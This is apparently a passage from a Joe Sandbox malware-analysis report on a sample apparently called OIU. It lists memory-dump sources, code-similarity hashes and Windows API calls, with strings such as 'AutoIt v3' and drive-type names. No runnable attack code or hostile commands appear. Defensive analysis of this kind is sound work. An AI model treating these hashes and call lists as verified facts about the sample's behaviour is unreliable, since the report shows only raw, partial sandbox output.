                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 115b9d5d900c3b8ee04efaa5ee0c5f3ca878b33566a22ae450cb8fab455f27dc
                                                                      • Instruction ID: d425e2f241248869be8054ef29ce8ef6f605f328984b96e616e6dd1c4c7f6775
                                                                      • Opcode Fuzzy Hash: 115b9d5d900c3b8ee04efaa5ee0c5f3ca878b33566a22ae450cb8fab455f27dc
                                                                      • Instruction Fuzzy Hash: 5E32F431A0414D8BCF28CE29C6D46BD7FE1EB45300F2885EAD65ACB296D3709DC9DB81
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: a4b7b169ee080bca516ada4d42eab0247b125bc589ac955f2944a041901e09d6
                                                                      • Instruction ID: f78286f51ee86ed7d04c5d97bbd1437871879975678e53f1279e0c829c8f6796
                                                                      • Opcode Fuzzy Hash: a4b7b169ee080bca516ada4d42eab0247b125bc589ac955f2944a041901e09d6
                                                                      • Instruction Fuzzy Hash: 5C22A1B0A0860AEFDF14CF65C881AAEB3F5FF45304F1445A9E816A7291EB35AD15CB60
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: f2804cf595d6e00f0a2cf31eded419d618401bcb7fda9d91d352bd54e61952d3
                                                                      • Instruction ID: fe24a11c5998c9efc6efd0375eff6b58c534cb1ce195055ede8ccfcecc14261b
                                                                      • Opcode Fuzzy Hash: f2804cf595d6e00f0a2cf31eded419d618401bcb7fda9d91d352bd54e61952d3
                                                                      • Instruction Fuzzy Hash: 9D02A5B0E00246EBDB14DF65D881BAEB7F5FF44300F1081A9E8169B391EB71EA11DB95
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 40101273f58913c3cb3bc7eb54df01d47b4121c3e67d19f11ec2cb23d33ea445
                                                                      • Instruction ID: eca8ef6f3bec72f41531e77c5693283af363a126b6130355e6f9da5183a91734
                                                                      • Opcode Fuzzy Hash: 40101273f58913c3cb3bc7eb54df01d47b4121c3e67d19f11ec2cb23d33ea445
                                                                      • Instruction Fuzzy Hash: 73914A722090A34ADB2D467D8574A3DFFE19A533A13190BDDE4F2DA1C2FD24C965D620
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: dcacdbfb90637a371881b614cd7cead2a12a14af116f693b82f5d278324c3a9a
                                                                      • Instruction ID: 3f2fdc04e442e69c2248f9a1728657ac3c04d39dd2dc3d9f9690401b0d56ba66
                                                                      • Opcode Fuzzy Hash: dcacdbfb90637a371881b614cd7cead2a12a14af116f693b82f5d278324c3a9a
                                                                      • Instruction Fuzzy Hash: 596136717C8709A6DB349A2889A5FBF23D4DF41710F1409DEF882DB281DE519E428F55
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: d59e8ed12c3cbf7e995441ff0062cdd822e6bb5b32d522b63f5a22d796f4ef69
                                                                      • Instruction ID: 65d68466db1511d181e75fd3b8e364e0a86224dbf910fb23c87b36f59bb4e46c
                                                                      • Opcode Fuzzy Hash: d59e8ed12c3cbf7e995441ff0062cdd822e6bb5b32d522b63f5a22d796f4ef69
                                                                      • Instruction Fuzzy Hash: 7C616BB26C870A67DA389A284896FBF23D8DF41740F1009FDF843DB281DE129D42CE55
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 70da388f96bbbf26b230a155b4728740b34f0d100ea60ab2bbadb9d7d0befbf0
                                                                      • Instruction ID: 2378da0972e3d0603f03b5f5a78a99823320c5526706a6d45649cbf201f9cb71
                                                                      • Opcode Fuzzy Hash: 70da388f96bbbf26b230a155b4728740b34f0d100ea60ab2bbadb9d7d0befbf0
                                                                      • Instruction Fuzzy Hash: 3781777260D0A349DB2D463D857493EFFE19A933A131A0BDED4F2DA1C3EE24C955D620
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 44efcf01abca864eb748ed96d3b04504d2efe77390c1dc73f4812cc06671f852
                                                                      • Instruction ID: 2b93dd3de63335e88f9165079c2def7a7a363cfe1f1719a4d679c5a56ed5d333
                                                                      • Opcode Fuzzy Hash: 44efcf01abca864eb748ed96d3b04504d2efe77390c1dc73f4812cc06671f852
                                                                      • Instruction Fuzzy Hash: 2321A5326206118BDB28CF79C8227BE73E5A754310F25862EE4A7C37D1DE39A944DB80
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • DeleteObject.GDI32(00000000), ref: 00C22B30
                                                                      • DeleteObject.GDI32(00000000), ref: 00C22B43
                                                                      • DestroyWindow.USER32 ref: 00C22B52
                                                                      • GetDesktopWindow.USER32 ref: 00C22B6D
                                                                      • GetWindowRect.USER32(00000000), ref: 00C22B74
                                                                      • SetRect.USER32 ref: 00C22CA3
                                                                      • AdjustWindowRectEx.USER32(?,88C00000,00000000,?), ref: 00C22CB1
                                                                      • CreateWindowExW.USER32 ref: 00C22CF8
                                                                      • GetClientRect.USER32 ref: 00C22D04
                                                                      • CreateWindowExW.USER32 ref: 00C22D40
                                                                      • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000), ref: 00C22D62
                                                                      • GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00C22D75
                                                                      • GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00C22D80
                                                                      • GlobalLock.KERNEL32 ref: 00C22D89
                                                                      • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 00C22D98
                                                                      • GlobalUnlock.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00C22DA1
                                                                      • CloseHandle.KERNEL32(00000000), ref: 00C22DA8
                                                                      • GlobalFree.KERNEL32(00000000), ref: 00C22DB3
                                                                      • CreateStreamOnHGlobal.OLE32(00000000,00000001,?), ref: 00C22DC5
                                                                      • OleLoadPicture.OLEAUT32(?,00000000,00000000,00C3FC38,00000000), ref: 00C22DDB
                                                                      • GlobalFree.KERNEL32(00000000), ref: 00C22DEB
                                                                      • CopyImage.USER32 ref: 00C22E11
                                                                      • SendMessageW.USER32(00000000,00000172,00000000,00000007), ref: 00C22E30
                                                                      • SetWindowPos.USER32(00000000,00000000,00000000,00000000,?,?,00000020), ref: 00C22E52
                                                                      • ShowWindow.USER32(00000004), ref: 00C2303F
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
                                                                      • String ID: $AutoIt v3$DISPLAY$static
                                                                      • API String ID: 2211948467-2373415609
                                                                      • Opcode ID: 062f213d4a729d855a8fa1cd44edefde9c7fb0073f2f496221d3e5817de8bb53
                                                                      • Instruction ID: 81eeff2b0e6bb7eead765bc12150f108f514772a89e218da3a95784a1b568cac
                                                                      • Opcode Fuzzy Hash: 062f213d4a729d855a8fa1cd44edefde9c7fb0073f2f496221d3e5817de8bb53
                                                                      • Instruction Fuzzy Hash: C5026971A10219AFDB14DFA4DC89FAE7BB9EF49310F048158F915AB2A1CB74ED41CB60
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • SetTextColor.GDI32(?,00000000), ref: 00C3712F
                                                                      • GetSysColorBrush.USER32 ref: 00C37160
                                                                      • GetSysColor.USER32 ref: 00C3716C
                                                                      • SetBkColor.GDI32(?,000000FF), ref: 00C37186
                                                                      • SelectObject.GDI32(?,?), ref: 00C37195
                                                                      • InflateRect.USER32 ref: 00C371C0
                                                                      • GetSysColor.USER32 ref: 00C371C8
                                                                      • CreateSolidBrush.GDI32(00000000), ref: 00C371CF
                                                                      • FrameRect.USER32 ref: 00C371DE
                                                                      • DeleteObject.GDI32(00000000), ref: 00C371E5
                                                                      • InflateRect.USER32 ref: 00C37230
                                                                      • FillRect.USER32 ref: 00C37262
                                                                      • GetWindowLongW.USER32(?,000000F0), ref: 00C37284
                                                                        • Part of subcall function 00C373E8: GetSysColor.USER32 ref: 00C37421
                                                                        • Part of subcall function 00C373E8: SetTextColor.GDI32(?,?), ref: 00C37425
                                                                        • Part of subcall function 00C373E8: GetSysColorBrush.USER32 ref: 00C3743B
                                                                        • Part of subcall function 00C373E8: GetSysColor.USER32 ref: 00C37446
                                                                        • Part of subcall function 00C373E8: GetSysColor.USER32 ref: 00C37463
                                                                        • Part of subcall function 00C373E8: CreatePen.GDI32(00000000,00000001,00743C00), ref: 00C37471
                                                                        • Part of subcall function 00C373E8: SelectObject.GDI32(?,00000000), ref: 00C37482
                                                                        • Part of subcall function 00C373E8: SetBkColor.GDI32(?,00000000), ref: 00C3748B
                                                                        • Part of subcall function 00C373E8: SelectObject.GDI32(?,?), ref: 00C37498
                                                                        • Part of subcall function 00C373E8: InflateRect.USER32 ref: 00C374B7
                                                                        • Part of subcall function 00C373E8: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00C374CE
                                                                        • Part of subcall function 00C373E8: GetWindowLongW.USER32(00000000,000000F0), ref: 00C374DB
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameRoundSolid
                                                                      • String ID:
                                                                      • API String ID: 4124339563-0
                                                                      • Opcode ID: a09bd51e427aa6f6ea707d5220594f299d6b2b339d8f5307ddcc099ea99855c5
                                                                      • Instruction ID: 1158584cf5a885e73b2aa752f487cde26d01bc38c808ae382ef21e405ca5a008
                                                                      • Opcode Fuzzy Hash: a09bd51e427aa6f6ea707d5220594f299d6b2b339d8f5307ddcc099ea99855c5
                                                                      • Instruction Fuzzy Hash: A7A18EB2018301EFDB109F64DC88B6F7BA9FB49321F100B19F962A61E1D775E944DB91
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • DestroyWindow.USER32 ref: 00BB8E14
                                                                      • SendMessageW.USER32(?,00001308,?,00000000), ref: 00BF6AC5
                                                                      • ImageList_Remove.COMCTL32(?,000000FF,?), ref: 00BF6AFE
                                                                      • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 00BF6F43
                                                                        • Part of subcall function 00BB8F62: InvalidateRect.USER32(?,00000000,00000001), ref: 00BB8FC5
                                                                      • SendMessageW.USER32(?,00001053), ref: 00BF6F7F
                                                                      • SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 00BF6F96
                                                                      • ImageList_Destroy.COMCTL32(00000000,?), ref: 00BF6FAC
                                                                      • ImageList_Destroy.COMCTL32(00000000,?), ref: 00BF6FB7
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: DestroyImageList_MessageSend$Window$InvalidateMoveRectRemove
                                                                      • String ID: 0
                                                                      • API String ID: 2760611726-4108050209
                                                                      • Opcode ID: 3092b9e54e4ee5d76bd7e05797f6096326d2d9330ee2dd4bc5eb03e5d1bb8caa
                                                                      • Instruction ID: 790a1166e1859a0b586f60b957a8a288019c676a2b377dfbdb233cf8482447da
                                                                      • Opcode Fuzzy Hash: 3092b9e54e4ee5d76bd7e05797f6096326d2d9330ee2dd4bc5eb03e5d1bb8caa
                                                                      • Instruction Fuzzy Hash: FE12AD35200205DFDB25DF28C884BB9B7F5FB44310F1884A9FA899B261CB71EC96DB91
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • DestroyWindow.USER32 ref: 00C2273E
                                                                      • SystemParametersInfoW.USER32 ref: 00C2286A
                                                                      • SetRect.USER32 ref: 00C228A9
                                                                      • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000008), ref: 00C228B9
                                                                      • CreateWindowExW.USER32 ref: 00C22900
                                                                      • GetClientRect.USER32 ref: 00C2290C
                                                                      • CreateWindowExW.USER32 ref: 00C22955
                                                                      • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00C22964
                                                                      • GetStockObject.GDI32(00000011), ref: 00C22974
                                                                      • SelectObject.GDI32(00000000,00000000), ref: 00C22978
                                                                      • GetTextFaceW.GDI32(00000000,00000040,?), ref: 00C22988
                                                                      • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00C22991
                                                                      • DeleteDC.GDI32(00000000), ref: 00C2299A
                                                                      • CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 00C229C6
                                                                      • SendMessageW.USER32(00000030,00000000,00000001), ref: 00C229DD
                                                                      • CreateWindowExW.USER32 ref: 00C22A1D
                                                                      • SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 00C22A31
                                                                      • SendMessageW.USER32(00000404,00000001,00000000), ref: 00C22A42
                                                                      • CreateWindowExW.USER32 ref: 00C22A77
                                                                      • GetStockObject.GDI32(00000011), ref: 00C22A82
                                                                      • SendMessageW.USER32(00000030,00000000,?,50000000), ref: 00C22A8D
                                                                      • ShowWindow.USER32(00000004), ref: 00C22A97
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                                                                      • String ID: AutoIt v3$DISPLAY$msctls_progress32$static
                                                                      • API String ID: 2910397461-517079104
                                                                      • Opcode ID: 5259453a481c0000c11837491c6764af6fad58ae3d28e2b03a1771b558b2c703
                                                                      • Instruction ID: cb8c222c7c5131809b135746961c38c66b87a70e15164f491fe4c8daf6dae4cd
                                                                      • Opcode Fuzzy Hash: 5259453a481c0000c11837491c6764af6fad58ae3d28e2b03a1771b558b2c703
                                                                      • Instruction Fuzzy Hash: 87B15B71A50215AFEB14DF68DC8AFAE7BB9EB09710F048154F915E72A0DB74ED40CBA0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • SetErrorMode.KERNEL32(00000001), ref: 00C14AED
                                                                      • GetDriveTypeW.KERNEL32(?,00C3CB68,?,\\.\,00C3CC08), ref: 00C14BCA
                                                                      • SetErrorMode.KERNEL32(00000000,00C3CB68,?,\\.\,00C3CC08), ref: 00C14D36
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: ErrorMode$DriveType
                                                                      • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
                                                                      • API String ID: 2907320926-4222207086
                                                                      • Opcode ID: 57b4c045b1501a2743f8e3420ce2fcd51f30741f0536420e79846370cf403c62
                                                                      • Instruction ID: 56c3de8e40159a8a9b0a22df85e0cbe10a3114e2ebdd552de4e068d2ebd8b569
                                                                      • Opcode Fuzzy Hash: 57b4c045b1501a2743f8e3420ce2fcd51f30741f0536420e79846370cf403c62
                                                                      • Instruction Fuzzy Hash: 1D61B370709105EBCB18DF25CAE1DEDB7A1EB47740B2484A5F806AB291DB35DE81FB81
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • GetSysColor.USER32 ref: 00C37421
                                                                      • SetTextColor.GDI32(?,?), ref: 00C37425
                                                                      • GetSysColorBrush.USER32 ref: 00C3743B
                                                                      • GetSysColor.USER32 ref: 00C37446
                                                                      • CreateSolidBrush.GDI32(?), ref: 00C3744B
                                                                      • GetSysColor.USER32 ref: 00C37463
                                                                      • CreatePen.GDI32(00000000,00000001,00743C00), ref: 00C37471
                                                                      • SelectObject.GDI32(?,00000000), ref: 00C37482
                                                                      • SetBkColor.GDI32(?,00000000), ref: 00C3748B
                                                                      • SelectObject.GDI32(?,?), ref: 00C37498
                                                                      • InflateRect.USER32 ref: 00C374B7
                                                                      • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00C374CE
                                                                      • GetWindowLongW.USER32(00000000,000000F0), ref: 00C374DB
                                                                      • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00C3752A
                                                                      • GetWindowTextW.USER32 ref: 00C37554
                                                                      • InflateRect.USER32 ref: 00C37572
                                                                      • DrawFocusRect.USER32 ref: 00C3757D
                                                                      • GetSysColor.USER32 ref: 00C3758E
                                                                      • SetTextColor.GDI32(?,00000000), ref: 00C37596
                                                                      • DrawTextW.USER32(?,00C370F5,000000FF,?,00000000), ref: 00C375A8
                                                                      • SelectObject.GDI32(?,?), ref: 00C375BF
                                                                      • DeleteObject.GDI32(?), ref: 00C375CA
                                                                      • SelectObject.GDI32(?,?), ref: 00C375D0
                                                                      • DeleteObject.GDI32(?), ref: 00C375D5
                                                                      • SetTextColor.GDI32(?,?), ref: 00C375DB
                                                                      • SetBkColor.GDI32(?,?), ref: 00C375E5
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmp
